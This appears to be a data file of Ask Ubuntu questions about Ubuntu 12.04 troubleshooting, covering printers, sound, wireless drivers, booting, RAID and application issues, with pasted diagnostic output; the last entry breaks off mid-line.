129376	how to change menu font contrast in gnome classic ?	i have problem with color of menu in ubuntu 12.04 ( gnome classic ) . look image : in gnome classic ( no effect ) all is ok . sorry for english .
129379	parallel printing not supported on 12.04lts	i upgraded to ubuntu 12.04 and now cups printing can not find my printer . it 's an hp 970cse and uses parallel printing . is n't parallel printing supported anymore ?
129382	gnu make not found - how to install gnu make on 12.04	we have set up an ubuntu 12.04 lts server for ror . we did successfully install rvm and git . however installation failed with rvm for zlib and ruby 1.9.3 . here is the error log for $ rvm install 1.9.3 : checking pthread.h presence ... yes checking for pthread.h ... yes checking for if make is gnu make ... ./configure : line 17125 : make : command not found the problem seems to be with gnu make . any solutions to fix ? thanks so much .
129383	libreoffice not opening	if a try to open libreoffice or any document ( spreadsheets , presentations , written or .doc files ) , it will atempt to start the aplication and just exit it with no error before starting .
129391	some videos stopped playing in mythbuntu 12.04	i 've had a mythbuntu installation that was first installed somewhere around version 9 or so , and has been upgraded ever since . it has played pretty much every video in every format i 've thrown at it . however , since upgrading to 12.04 , some video files do not play , and i ca n't determine why . it might be particular to .avi files , but some .avi files do play , so i 'm not sure . i 've checked all the logs in /var/log/mythv , but found no errors . what can i do to determine what the problem is and fix it ? also note , i tried following these intructions , which claim to be a comprehensive installation of all codecs and software necessary to play any video , but it did not solve the problem . update : as suggested , i ran the program mediainfo to compare two video files , one that works and one that does n't , and here is the output , trimmed down to just the output that is different . this is a video that works : overall bit rate : 1 289 kbps bit rate : 1 142 kbps maximum bit rate : 5 892 kbps frame rate : 29.970 fps bits/ ( pixel*frame ) : 0.131 stream size : 740 mib ( 89 % ) encoding settings : cabac=1 / ref=5 / deblock=1:0:0 / analyse=0x3:0x113 / me=umh / subme=8 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=16 / chroma_me=1 / trellis=1 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=12 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / bluray_compat=0 / constrained_intra=0 / bframes=3 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=25 / scenecut=40 / intra_refresh=0 / rc_lookahead=50 / rc=crf / mbtree=1 / crf=22.0 / qcomp=0.60 / qpmin=0 / qpmax=69 / qpstep=4 / ip_ratio=1.40 / aq=1:1.00 bit rate : 144 kbps maximum bit rate : 179 kbps stream size : 92.2 mib ( 11 % ) this is a video that does n't : overall bit rate : 1 555 kbps bit rate : 1 437 kbps maximum bit rate : 3 651 kbps frame rate : 23.976 fps bits/ ( pixel*frame ) : 0.206 stream size : 221 mib ( 92 % ) encoding settings : cabac=1 / ref=5 / deblock=1:2:2 / analyse=0x3:0x133 / me=umh / subme=9 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=16 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=14 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / bluray_compat=0 / constrained_intra=0 / bframes=3 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=23 / scenecut=40 / intra_refresh=0 / rc_lookahead=60 / rc=crf / mbtree=1 / crf=20.0 / qcomp=0.60 / qpmin=0 / qpmax=69 / qpstep=4 / ip_ratio=1.40 / aq=1:1.00 bit rate : 114 kbps maximum bit rate : 142 kbps stream size : 17.5 mib ( 7 % )
129394	poor sound quality on a dell xps 15 ( l502x )	i have a problem with my sound on my dell xps 15 . first , when i had windows 7 , my sound was pretty good ( i have a jbl 2.1 speaker system with waves maxx audio ) , but since i installed ubuntu 12.04 it sounded very cheap and as if i put my laptop in a tin can . i 've already tried installing alsa-hda-dkms from the alsa-daily ppa ( http : //ppa.launchpad.net/ubuntu-audio-dev/alsa-daily ) this is my audio controller : laura @ laura-xps-l502x : ~ $ lspci -v | grep -a7 -i audio 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) subsystem : dell device 04b6 flags : bus master , fast devsel , latency 0 , irq 51 memory at f1c00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel i hope you can help me , and you can always ask me for more information . result of aplay -l : **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc665 analog [ alc665 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : alc665 digital [ alc665 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 result of aplay -l : default playback/recording through the pulseaudio sound server sysdefault : card=pch hda intel pch , alc665 analog default audio device front : card=pch , dev=0 hda intel pch , alc665 analog front speakers surround40 : card=pch , dev=0 hda intel pch , alc665 analog 4.0 surround output to front and rear speakers surround41 : card=pch , dev=0 hda intel pch , alc665 analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=pch , dev=0 hda intel pch , alc665 analog 5.0 surround output to front , center and rear speakers surround51 : card=pch , dev=0 hda intel pch , alc665 analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=pch , dev=0 hda intel pch , alc665 analog 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=pch , dev=0 hda intel pch , alc665 digital iec958 ( s/pdif ) digital audio output hdmi : card=pch , dev=0 hda intel pch , hdmi 0 hdmi audio output dmix : card=pch , dev=0 hda intel pch , alc665 analog direct sample mixing device dmix : card=pch , dev=1 hda intel pch , alc665 digital direct sample mixing device dmix : card=pch , dev=3 hda intel pch , hdmi 0 direct sample mixing device dsnoop : card=pch , dev=0 hda intel pch , alc665 analog direct sample snooping device dsnoop : card=pch , dev=1 hda intel pch , alc665 digital direct sample snooping device dsnoop : card=pch , dev=3 hda intel pch , hdmi 0 direct sample snooping device hw : card=pch , dev=0 hda intel pch , alc665 analog direct hardware device without any conversions hw : card=pch , dev=1 hda intel pch , alc665 digital direct hardware device without any conversions hw : card=pch , dev=3 hda intel pch , hdmi 0 direct hardware device without any conversions plughw : card=pch , dev=0 hda intel pch , alc665 analog hardware device with all software conversions plughw : card=pch , dev=1 hda intel pch , alc665 digital hardware device with all software conversions plughw : card=pch , dev=3 hda intel pch , hdmi 0 hardware device with all software conversions
129399	if i delete a windows drive , can i use that space to install ubuntu ?	i current have ubuntu installed using wubi under c : / drive . im on ubuntu 11.10 . im planning a full reinstall of ubuntu 12.04 , but this time without wubi . i want to install ubuntu on a single drive , like d : / or g : / can i do that ? if i delete and make some unallocated space can i use that to install ubuntu ? more info : five partitions c : 135 d : 50 e : 50 f : 180 g : 50 gparted shows i have primary ntfs 135 and other 330 as extended . i have windows 7 x64
129402	`` no caching mode page present '' when usb flash disk attached	when attaching a usb flash disk ( ntfs formatted ) to a laptop with ubuntu server 12.04 on board , i get following messages : [ 3572.355603 ] sd 2:0:0:0 : [ sdb ] no caching mode page present [ 3572.355640 ] sd 2:0:0:0 : [ sdb ] assuming drive cache : write through [ 3572.361599 ] sd 2:0:0:0 : [ sdb ] no caching mode page present [ 3572.361636 ] sd 2:0:0:0 : [ sdb ] assuming drive cache : write through i get them right in the terminal , so that i should press ctrl+c to proceed with working ( entering commands ) . is it normal or do i have to setup caching mode somehow ? thank you .
129406	modem-manager not working	i used to connect to the internet using my usb-modem in the earlier versions of ubuntu . but after installing precise i 'm not able to connect to the internet . please help . i do n't want to use windows but forced to do so .
129407	how do i turn on phonetic typing for tamil ?	is phonetic typing for tamil available in ubuntu 12.04 ? how can i install it ?
129410	unable to access network . how do i install the wi-fi drivers for my laptop ?	i 'm typing this with a laptop containing windows 7 in the hard drive , but i use my 500gb hard drive with ubuntu 12.04lts on it as well . i ca n't seem to connect to the internet through ethernet due to problems with the school 's hard network so i need to install the wifi drivers . ( i do n't have internet at home . i am forced to use internet while at school on the laptop . ) i downloaded the necessary tar.gz file , transfered it , and attempted to install it , but i have no clue how to follow the instructions . it does n't give very clear steps , and kinda assumes that i already mostly understand it . can anyone point me to where i can find clear , simple steps to how to install the driver ? or , even better , some kind of program that will install all of those things for me ? update : all i know is , when ubuntu told me that it needed the driver , it told me it wanted the `` broadcom sta wireless driver '' and when i googled it with my windows 7 hdd in , it gave me a page in the broadcom site with the drivers in 32 and 64 bit varients , and a very confusing readme file . the exact name of the file i got is : hybrid-portsrc_x86_32-v5_100_82_112.tar.gz the hardware name is : dell wireless 1397 wlan mini-card
129411	ctrl+a suddenly becomes home . what did i do ?	earlier today , i was tweaking my fresh ubuntu 12.04 installation . i added and removed ( and purged ) several ppas and also installed gnome shell . it was n't working the way i had intended it , so i removed it from the system . strangely enough -- and i do n't know if gnome shell might be responsible -- anytime i try to select all text ( ie ctrl+a ) , the cursor just goes back to the beginning of the line ( like the home key ) . does anybody know what i did so i can avoid doing the same mistake , and have a solution to that ? sorry for my bad english edit : okay , i did egrep -irl `` & gt ; a '' ~/.gconf/ but there was no output . also , ctrl+d becomes del and ctrl+f moves the cursor forward one character . this is getting weirder and weirder .
129412	pulseaudio and python3	accessing pulseaudio with python2 is a bit tricky , but it works with the help of ctypes . the problem is that the same code fails to work with python3 . apparently something was changed in ctypes , but i ca n't figure out what exactly . here 's the sample code , which will list all the source devices . it works in python2 , but segfaults horribly in python3 . # pulseaudio source list : import time from ctypes import * pa = cdll ( 'libpulse.so.0 ' ) pa_context_unconnected = 0 pa_context_connecting = 1 pa_context_authorizing = 2 pa_context_setting_name = 3 pa_context_ready = 4 pa_context_failed = 5 pa_context_terminated = 6 pa_operation_running = 0 pa_operation_done = 1 pa_operation_cancelled = 2 string = c_char_p size_t = c_ulong uint32_t = c_uint32 uint8_t = c_uint8 class pa_mainloop_api ( structure ) : pass class pa_threaded_mainloop ( structure ) : pass pa_threaded_mainloop._fields_ = [ ] pa_threaded_mainloop_new = pa.pa_threaded_mainloop_new pa_threaded_mainloop_new.restype = pointer ( pa_threaded_mainloop ) pa_threaded_mainloop_new.argtypes = [ ] pa_threaded_mainloop_free = pa.pa_threaded_mainloop_free pa_threaded_mainloop_free.restype = none pa_threaded_mainloop_free.argtypes = [ pointer ( pa_threaded_mainloop ) ] pa_threaded_mainloop_start = pa.pa_threaded_mainloop_start pa_threaded_mainloop_start.restype = c_int pa_threaded_mainloop_start.argtypes = [ pointer ( pa_threaded_mainloop ) ] pa_threaded_mainloop_stop = pa.pa_threaded_mainloop_stop pa_threaded_mainloop_stop.restype = none pa_threaded_mainloop_stop.argtypes = [ pointer ( pa_threaded_mainloop ) ] pa_threaded_mainloop_get_api = pa.pa_threaded_mainloop_get_api pa_threaded_mainloop_get_api.restype = pointer ( pa_mainloop_api ) pa_threaded_mainloop_get_api.argtypes = [ pointer ( pa_threaded_mainloop ) ] class pa_context ( structure ) : pass pa_context._fields_ = [ ] class pa_spawn_api ( structure ) : pass class pa_stream ( structure ) : pass pa_stream._fields_ = [ ] class pa_operation ( structure ) : pass class pa_source_info ( structure ) : pass pa_source_info._fields_ = [ ( 'name ' , string ) , ( 'index ' , uint32_t ) , ( 'description ' , string ) , ] pa_context_flags = c_int pa_context_flags_t = pa_context_flags pa_context_state = c_int pa_context_state_t = pa_context_state pa_context_notify_cb_t = cfunctype ( none , pointer ( pa_context ) , c_void_p ) pa_context_success_cb_t = cfunctype ( none , pointer ( pa_context ) , c_int , c_void_p ) pa_stream_success_cb_t = cfunctype ( none , pointer ( pa_stream ) , c_int , c_void_p ) pa_stream_request_cb_t = cfunctype ( none , pointer ( pa_stream ) , size_t , c_void_p ) pa_stream_notify_cb_t = cfunctype ( none , pointer ( pa_stream ) , c_void_p ) pa_source_info_cb_t = cfunctype ( none , pointer ( pa_context ) , pointer ( pa_source_info ) , c_int , c_void_p ) pa_context_new = pa.pa_context_new pa_context_new.restype = pointer ( pa_context ) pa_context_new.argtypes = [ pointer ( pa_mainloop_api ) , string ] pa_context_connect = pa.pa_context_connect pa_context_connect.restype = c_int pa_context_connect.argtypes = [ pointer ( pa_context ) , string , pa_context_flags_t , pointer ( pa_spawn_api ) ] pa_context_set_state_callback = pa.pa_context_set_state_callback pa_context_set_state_callback.restype = none pa_context_set_state_callback.argtypes = [ pointer ( pa_context ) , pa_context_notify_cb_t , c_void_p ] pa_context_get_state = pa.pa_context_get_state pa_context_get_state.restype = pa_context_state_t pa_context_get_state.argtypes = [ pointer ( pa_context ) ] pa_stream_set_state_callback = pa.pa_stream_set_state_callback pa_stream_set_state_callback.restype = none pa_stream_set_state_callback.argtypes = [ pointer ( pa_stream ) , pa_stream_notify_cb_t , c_void_p ] pa_context_get_source_info_list = pa.pa_context_get_source_info_list pa_context_get_source_info_list.restype = pointer ( pa_operation ) pa_context_get_source_info_list.argtypes = [ pointer ( pa_context ) , pa_source_info_cb_t , c_void_p ] def pa_state_cb ( context , userdata ) : global pa_state state = pa_context_get_state ( context ) if state in [ pa_context_unconnected , pa_context_connecting , pa_context_authorizing , pa_context_setting_name ] : pa_state = 0 elif state == pa_context_failed : pa_state = 2 elif state == pa_context_ready : pa_state = 1 return 0 def pa_sourcelist_cb ( context , source_info , eol , userdata ) : if eol==0 : print ( `` idx : '' , source_info.contents.index , `` `` , source_info.contents.name , `` -- '' , source_info.contents.description ) return 0 pa_ml = pa_threaded_mainloop_new ( ) pa_mlapi = pa_threaded_mainloop_get_api ( pa_ml ) pa_ctx = pa_context_new ( pa_mlapi , b '' kazam-pulse '' ) error = -1 pa_state = 0 if pa_context_connect ( pa_ctx , none , 0 , none ) ! =0 : print ( `` can not connect.. '' ) sys.exit ( 1 ) pa_context_set_state_callback ( pa_ctx , pa_context_notify_cb_t ( pa_state_cb ) , none ) ret = pa_threaded_mainloop_start ( pa_ml ) ctc = pa_context_get_state ( pa_ctx ) time.sleep ( 1 ) pa_context_get_source_info_list ( pa_ctx , pa_source_info_cb_t ( pa_sourcelist_cb ) , none ) ; time.sleep ( 1 ) and here 's the backtrace : # 0 0x00007ffff7e11fc1 in ? ? ( ) # 1 0x00007ffff5e82d27 in pa_context_set_state ( st=pa_context_authorizing , c=0xae7d40 ) at pulse/context.c:291 # 2 pa_context_set_state ( c=0xae7d40 , st=pa_context_authorizing ) at pulse/context.c:279 # 3 0x00007ffff5e85691 in setup_context ( io=0x7fffe8000910 , c=0xae7d40 ) at pulse/context.c:561 # 4 on_connection ( client= < optimized out > , io=0x7fffe8000910 , userdata=0xae7d40 ) at pulse/context.c:890 # 5 0x00007ffff5a440e6 in do_call ( c=0x9976c0 ) at pulsecore/socket-client.c:161 # 6 0x00007ffff5e96ba7 in dispatch_defer ( m=0x9ce180 ) at pulse/mainloop.c:704 # 7 pa_mainloop_dispatch ( m=0x9ce180 ) at pulse/mainloop.c:920 # 8 0x00007ffff5e96de5 in pa_mainloop_iterate ( m=0x9ce180 , block= < optimized out > , retval=0x0 ) at pulse/mainloop.c:960 # 9 0x00007ffff5e96e90 in pa_mainloop_run ( m=0x9ce180 , retval=0x0 ) at pulse/mainloop.c:975 # 10 0x00007ffff5ea530f in thread ( userdata=0x9a64a0 ) at pulse/thread-mainloop.c:88 # 11 0x00007ffff5a4ed18 in internal_thread_func ( userdata=0xa66840 ) at pulsecore/thread-posix.c:83 # 12 0x00007ffff7bc4e9a in start_thread ( ) from /lib/x86_64-linux-gnu/libpthread.so.0 # 13 0x00007ffff65844bd in clone ( ) from /lib/x86_64-linux-gnu/libc.so.6 # 14 0x0000000000000000 in ? ? ( )
129415	dozens ( and dozens ) of applications with no name or icon in dash	i upgraded from 10.04 lts to 12.04 lts . i have dozens ( and dozens ) of applications with no name or icon in dash . where are these coming from ? how can i clean them up ? edit : thanks for the suggestions . it turns out these were all coming from : ~/.local/share/applications/menu-xdg i `` deleted '' this folder and everything is fine now . cheers .
129416	qt apps problems in ubuntu 12.04	i have a few qt applications on my ubuntu 12.04 laptop , and not all of these seem to be running as desired . the applications in question are tomahawk , clementine , rstudio and speedcrunch . not all seem to be using the global menu that ubuntu provides ( tomahawk , speedcrunch and vlc # which works perfect # do , clementine and rstudio do n't ) . also i 've installed german localisation on my laptop which is running an english us version of ubuntu , but use it only for the spell-checking . this has somehow made most of my qt apps use it for the main language of the gui . my question is the following , am i able to resolve these 2 issues . i think the not using the global menu could be purposeful from clementine and rstudio , but i think i ought to be able to change the language settings of the qt apps . thank you in advance
129418	sound channel map incorrect on an ion 330 asrock	i have a ion 330 asrock just updated on precise and the sound channel mapping is incorrect . channel map is set as follow : front left = front left center = rear left front right = font right rear right = lfe rear left = center lfe = rear right i am testing the sound channel using speaker-test -c 2 -t wav can some one tell me how i can remap easily ? i have tried several possible changes to /etc/pulse/defaut.pa unsuccessfully .
129425	is there support for tamil ?	back in 2007 , there was a distribution tabuntu that enabled use of tamil on top of ubuntu . how can i similarly use tamil in a more up-to-date distro such as ubuntu ?
129432	is there a temparature monitor application for ubuntu 11.10 ?	on windows 7 i have got asus probe , which came with my asus p5qpl-am motherboard drivers dvd . it monitors disk speed , fan speed , processor temperature etc . is there such a alternative on ubuntu 11.10 ?
129436	restarted computer during update ; `` the system network service is not compatible with this version ''	yesterday i upgraded my ubuntu by ssh but before i finished it , i restarted my computer . i know that was not very smart . anyway now i do n't have internet connection , the wifi or ethernet is not recognized . when i try on the latest version installed , the mice did n't work . when i try with previous version and go in gnome-network manager it 's said : the system network service is not compatible with this version another thing is when i comeback to the remote computer and look at the ssh terminal the process have stopped at : setting up desktop-file-utils ( 0.20-0ubuntu2 ) ... configuration file `/etc/gnome/defaults.list ' == > modified ( by you or by a script ) since installation . == > package distributor has shipped an updated version . what would you like to do about it ? your options are : y or i : install the package maintainer 's version n or o : keep your currently-installed version d : show the differences between the versions z : start a shell to examine the situation the default action is to keep your current version . * defaults.list ( y/i/n/o/d/z ) [ default=n ] ? write failed : broken pipe is there any simple solution other than i having to reinstall my system ?
129439	unable to upgrade ubuntu 11.04 to ubuntu 11.10	when i tried to upgrade my ubuntu 11.04 to ubuntu 11.10 through update manager 's upgrade option , after entering password it did n't do aanything after downloading 2 upgrade files . i tried it several times but each time the result is same . so , please tell me how can i upgrade to 11.10 or higher version .
129440	best disk partitioning scheme for a java ee developer machine	are there some kind of `` best disk partitioning scheme '' for a linux-based java ee developer machine , in terms of performance , organization or others ? thanks in advance .
129448	touch screen not working on an hp touch-smart 610	i have a hp touch-smart 610 , and with ubuntu 11.10 everything works out of the box . i tried with the live cd to ubuntu 12.04 and sadly , the touch-screen do n't work . i would like to install 12.04 , but do n't want to lose the touch-screen .
129451	ca n't enter in ubuntu 12.04	after i have upgrade to ubuntu 12.04 , two days ago , i ca n't enter . after enter my login the screen shows a message : the system chrashed , one apps actual or former have failed . an then the screen gets in black . help me , please . thank you .
129452	application locked to launcher without icon	i tried to drag and drop transmission to my launcher in ubuntu 12.04 , and this is what i got : as you can see - there is an icon shaped space where an icon ought to be . transmission is locked to the launcher - but i only know this from right-clicking on the space ( which gives me the option to unlock it , as well as start the application minimised or with all downloads paused ) . left-clicking on the space does not launch transmission . why do n't i have a launchable icon of transmission in my launcher ?
129460	workaround for volume settings going to maximum after reboot	i recently upgraded my dell e6510 laptop to 12.04 ( ubuntu with unity ) . i 've noticed that after every reboot , the volume always resets itself to a maximum level . while i try to work out whether this is a bug , i 'd like to know if there is something i can do at login or startup that will mute ( or perhaps just reduce ) the system volume . after checking reverendj1 's answer , i tried pacmd set-sink-volume 0 0 and then sudo alsactl store , after the first command failed to work . i also did a right-click on the volume indicator and went to sound settings ... '' -- from there , i selected built-in audio analog output on the output tab ( it was my only choice , but it was n't highlighted for some reason ) . during this troubleshooting process , i rebooted a few times . i 'm not 100 % sure whether any of the analog output settings had ever been altered from the install defaults , but i 'm documenting the setting for posterity , in case someone else runs into this :
129469	eclipse check for updates issue	i install eclipse from the software center so it links up and will be updated with the rest of my software . because i am developing for android , however , i have to install the adt plugin within eclipse by going to help > install new software ( or something to that effect ) . now , i do understand that i can update eclipse through the actual ubuntu software center/system , but in order to update plugins and extensions within eclipse , i have to go to help > check for updates ( which then scans all plugins for updates ) . the only issue , is that when i installed through the software center , the owner became root , and whenever i run it without root , i 'm not able to update - i get the error message `` insufficient access privileges to apply this update . '' when i run it as root , all of my plugins disappear , because i guess i installed them as myself , not as root . i tried to install the plugins as root , but the install new software choice would not work . ubuntu 12.04 and eclipse 3.7.2-1
129470	compiz ( or even compositing in general ) is not starting up when i login . solution ?	whenever i log into a desktop environment , it does n't seem that compositing is starting . unity 2d works fine , but when i go to unity 3d compiz does n't start up . i have to type compiz -- replace & in terminal every time i login . another example is when i log into a cinnamon session , theming support is suddenly gone ( although this may be a separate issue ) . if it helps im using the latest ( 295.40 ) nvidia drivers . edit : i am having exactly the same issue in both cases , upgrading from 11.10 and with a clean installation , in 32 and 64 bits . related post .
129475	problem installing bumblebee on ubuntu 12.04	i have problems with bumblebee installation on ubuntu 12.04 , when i use this code to install it , i got this message in terminal : reading package lists ... done building dependency tree reading state information ... done package bumblebee is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'bumblebee ' has no installation candidate e : unable to locate package bumblebee-nvidia last 2 lines are problematic . thanks in advance , tom
129477	server certificate problem with cisco anyconnect vpn client	when i try to connect using the cisco anyconnect vpn client , i receive this error : connection attempt has failed due to server certificate problem . i happened to have this problem in my previous ubuntu 11.10 installation . that time i could fix it using some tutorials on the internet ( i do n't remember which one ) . basically , they suggested installing 4-5 packages and then some ln -s. but this time none of them are working . can anyone help me step by step ?
129480	installation on ssd	i want to install new 12.04 on ocz vertex3 disk . do i need make proper partition alignment or something like that ? some people say that modern ssds and linux distros do n't require any special manipulations for that case , some people say that i still need to play with fdisk . what to do ?
129487	the hud not functioning as it used to ( as expected )	i 've been using 12.04 since it was in beta 1 , and have really enjoyed the hud feature . as soon as it was officially released , or very soon after , the hud stopped working in some of the apps i like . the biggest on is in chromium . during beta , while browsing the web , i would quickly tap alt and type history then and i would be taken to my history page . now , i ca n't get any commands at all to work in chromium , nor in opera . this feature has so much potential , i do n't want to be stuck with a broken hud thanks , kyle
129488	konica minolta 4750en unable to print following 12.04 upgrade	printer used to work fine in 11.04 and 11.10 and still does from an 11.10 installed laptop on the network . this is a fresh 12.04 install + apt-get update and upgrade as the upgrade from oneiric via dvd hung up requiring a reinstall , but that 's another story : } ) . printing a test page from the printer control panel or via cups administration appears to send the file to the printer , which then sticks with the lcd stating processing until i reboot the printer . i 've tried installing the printer driver via cups and via the unity printing control panel without success .
129490	error : no default or ui configuration directive found	i downloaded the new 12.04 file amd64 iso . burned it to a cd but having no luck . new dell inspiron 17r 64 bit with windows 7 home premium . set the computer to boot from the cd/dvd but it comes up with no default or ui configuration directive found ? burned two more disk but no lick with any of the three . any help appreciated . thanks matt
129492	how to pause banshee when screen lock	i am running on ubuntu 12.04 and banshee version is 2.96 , i am looking for plugin or script which can pause any track that is playing banshee when i lock the screen . thanks .
129494	how do i quickly move a file from one tab to the other in pcmanfm	if i use f3 in nautilus , i right-click on the file and select `` move to other pane '' . how do i move a file from one tab to the other in pcmanfm ?
129495	replacing ubuntu 10.04 lts with 12.04 on dual boot ?	i have ubuntu 10.04 lts on my laptop installed with the option to boot windows vista when i want to . how can i install ubuntu 12.04 lts exaclty where i have ubuntu 10.04 lts now without changing/affecting anything else ?
129499	12.04 wo n't install from disk	i am trying to install ubuntu from the disk which i burned the 12.04 image to . so i went into the bios and disabled boot from everything except cd-rom , and it said there was no bootable partition . and on another pc it said `` boot device and press enter '' .
129500	how to download a specific package beforehand , so that i can install this after setting up ubuntu without having an internet connection ?	i am about to format my computer and install ubuntu . this particular computer is the local server that provides internet to all machines in our network . i will be installing ubuntu 12.04 server edition . however , for my internet to work i need a particular package , which is not included in the regular list of packages that are included in the installation . this is the madwimax package . after i install ubuntu , what is the proper way to install madwimax , without some manual install ( i.e . using apt-get , but without having internet ) ? currently i still have internet so i can go and download certain packages , but i 'm just not sure what and how .
129511	blank screen after upgrade from 11.10 to 12.04	i 've searched through the archives , but have n't found my specific problem yet . my apologies if this has been answered . i upgraded 11.10 to 12.04 this morning and the install went fine i think . when i restarted , i got the purple screen with five dots and then a blank screen . if i hit alt+ctrl+f1 i get the login screen , but am stuck there . i have ubuntu dual booted with windows 7 on a samsung 9 laptop . i am not a beginner , but i am a bit lost as to what to do next . i 've seen a number of posts about grub , but i am unsure if this applies to my case . any help is much appreciated !
129512	how do i change the scrollbar 's color in firefox ?	i ca n't see where i am in the pages since the color of the scrollbar is the same as the background ... can i change the color , maybe with ./gtk-2/apps/ff.rc ? i could n't find anything about it . thanks .
129523	dual os goes into infinite reboot	i have both windows 7 and ubuntu 12.04 installed on my laptop . for some reason , windows had an error , so it started the repair tool . this was taking a while and so i cancelled it . now my grub screen is gone , when i load up the computer it goes into an infinite reboot state . i can still access the bios and windows 7 and ubuntu 12.04 both still seem to be there ( i am writing this from ubuntu 11.10 , which i have on a bootable dvd ) . obviously the last resort is to remove everything and just use ubuntu , but it would be much nicer to have them both fixed . is there a way to re-install the grub screen or something ?
129524	how to switch display from laptop to external monitor ?	ubuntu version is 10.10 and the laptop is lenovo w520 . a monitor is connected to the laptop through vga . display works under window 7 . but under ubuntu , system- > preferences- > monitors only sees the laptop , not external monitor . how to switch and display on the external monitor ? thanks !
129534	flash player not present in chrome	so i recently upgraded to 12.04 ( even though i hate unity ) , and after the installation froze and my computer would no longer boot , after booting from a usb stick and installing 12.04 fresh , i downloaded chrome . however , flash player ( which is supposed to be built in ) is not present . whenever i try to watch a video , i get a notification to install flash player , and the most help that adobe 's website gives is this technote however , when i go to , there is no result for flash except for this entry under the table for mime types for the vlc plugin : video/flv flash video .flv i 'd be grateful for any ideas .
129539	jabber chat room user list missing ?	i 'm using empathy to join a jabber chat room . i have this setup on two ubuntu machines , both running 12.04 . to the right of the chat window should be a list of all the users currently in the chat room , but on one of my machines this list is n't there . how can i get it to appear ? closing/reopening the chat room or rebooting do n't make any difference . there are no menu or configuration options that i can see to control whether or not this list is shown .
129541	how to make ubuntu not to lock the screen while running vmware in fullscreen ?	i am running windows xp inside vmware player . i have two monitors and i keep vmware in fullscreen on the second monitor . the problem is that if i work long enough in inside windows xp , ubuntu locks the screen as if i was idle . once that happens i need to enter my password in order to return to the desktop on the other monitor . is there a way to fix or workaround this problem without disabling screensaver lock in ubuntu temporarily or permanently ?
129547	gnome-network-manager config file migration	i think i have an issue with gnome-network-manager , i used to have a lot of connections configured , wireless , wired and vpn . after upgrading to 12.04 ( from 11.10 ) i lost every configuration . i realized that the configs that used to be saved in $ home/.gconf/system/networking/connections now are being saved in /etc/networkmanager/system-connections/ . i do n't know how to migrate my settings to the new config file format can anybody help me ? jorge @ thinky : ~ $ sudo lshw -c network *-network description : ethernet interface product : 82566mm gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 03 serial : 00:1f : e2:14:5a:9b capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.5.1-k firmware=0.3-0 latency=0 link=no multicast=yes port=twisted pair resources : irq:46 memory : fe000000-fe01ffff memory : fe025000-fe025fff ioport:1840 ( size=32 ) *-network description : wireless interface product : pro/wireless 4965 ag or agn [ kedron ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 61 serial : 00:21:5c:32 : c2 : e5 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl4965 driverversion=3.2.0-23-generic-pae firmware=228.61.2.24 ip=192.168.2.103 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:47 memory : df3fe000-df3fffff jorge @ thinky : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04 lts release : 12.04 codename : precise jorge @ thinky : ~ $ uname -a linux thinky 3.2.0-23-generic-pae # 36-ubuntu smp tue apr 10 22:19:09 utc 2012 i686 i686 i386 gnu/linux jorge @ thinky : ~ $ dpkg -l | grep -i firm ii linux-firmware 1.79 firmware for linux kernel drivers
129550	how to see which accounts contain unread e-mails when they are not expanded ?	in earlier versions of thunderbird you knew which account folders had incoming e-mails even when they are not expanded . usually the mailbox icon left beside the e-mail-address account changed and showed a little green arrow . now this is totally stupid , the icons does n't change when there are any incoming e-mails . you get a notification , but i even want to see which mailbox have incoming e-mails . otherwise i need to expand all my e-mail accounts and i do n't have so much space on view . i already tried another theme , but same result . i already tried to disable the default extensions but it did n't help . any suggestions ?
129552	ubuntu raid configuration lost after reboot	i have a jmicron raid controller on the motherboard , and i have a menu in which i can set raid arrays when the system boots . i 've set it to raid-1 and added my two identical 2tb disks ( the os disk is separate ) . in ubuntu , in the disk utility , i could see these 2 hard disks and i could see an additional entry under peripheral devices which was a 2tb disk . i assumed that this is some sort of a virtual view over my raid array . i used the format volume option to format ( ntfs ) the 2tb disk listed under peripheral devices . it appeared as a mounted device in the /media/data_raid . i 've copied most of the files there and it worked fine . i 've rebooted the system , and now i suddenly see an additional 3 disks in peripheral devices , which does n't make sense . also , i can no longer mount the /media/data_raid - clicking on it in gnome yields the following error message . `` one or more block devices are holding /dev/dm-0 '' this is how things look in disk utility : there are additional 3 entries in /dev/mapper for some reason : ~ $ ls -l /dev/mapper total 0 crw -- -- -- - 1 root root 10 , 236 2012-05-01 20:01 control lrwxrwxrwx 1 root root 7 2012-05-01 20:15 isw_bjcjaghhjj_data 